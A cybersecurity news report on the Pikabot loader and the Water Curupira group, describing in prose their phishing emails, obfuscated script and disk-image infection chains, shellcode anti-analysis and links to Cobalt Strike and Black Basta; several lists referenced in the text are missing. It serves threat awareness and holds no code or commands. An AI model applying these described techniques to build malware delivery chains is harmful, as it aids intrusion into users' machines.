Pikabot is a loader malware that is active in spam campaigns and has been used by the threat group Water Curupira, which has been paused from June to September 2023 after Qakbot's takedown.
The surge in Pikabot phishing campaigns was noted recently in Q4 2023, post-Qakbot's takedown, suggesting it is a potential replacement.
Recently, the cybersecurity researchers at Trend Micro discovered that Water Curupira hackers have been actively launching Pikabot Malware attacks on Windows machines.
Compounding the problem are zero-day vulnerabilities like the MOVEit SQLi, Zimbra XSS, and 300+ such vulnerabilities that get discovered each month.
The phishing operations of Pikabot deploy the following two key things for unauthorized remote access:-.
Water Curupira, which is known for Cobalt Strike backdoors, has shifted exclusively to Pikabot post-DarkGate and IcedID campaigns in Q3 2023.
The Pikabot malware gains initial access via spam emails, mirroring Qakbot's behavior.
Threat actors use thread-hijacking in emails to mimic legitimate threads for deception.
They craft messages with original content in which they urge recipients to open the following types of attachments, with varying file names and passwords:-.
The attached archive holds an obfuscated JS file that is more than 100 KB in size, when executed it attempts conditional commands via cmd.
If it is unsuccessful, the script echoes, pings, and downloads the Pikabot payload using Curl.exe.
Another chain deploys password-protected archives with an IMG file that executes the LNK file, which triggers the rundll32.
Exe to run Pikabot DLL. The PDF-based attack in Q4 2023 tricks victims with OneDrive disguise, delivering malicious JS files.
The latter variant employs array manipulation and obfuscation for Pikabot payload retrieval using the following things:-.
Security analysis of the DLL file reveals a 32-bit sample with 1515 exports.
The 'Limit' export decrypts and executes shellcode, which checks for debugging with Windows API calls.
The shellcode decrypts another DLL for anti-analysis routines and loads encrypted PNG images containing the core module.
The Pikabot injects the core module into a suspended process using indirect system calls and resolves necessary APIs through hash values after decryption.
Water Curupira shifts to Pikabot by dropping backdoors like Cobalt Strike, which is linked to Black Basta ransomware.
The clusters of Cobalt Strike beacons and more than 70 C&C domains that are observed in campaigns by this threat actor show the association with dangerous ransomware, Black Basta.
This Cyber News was published on gbhackers.com. Publication date: Wed, 10 Jan 2024 11:13:10 +0000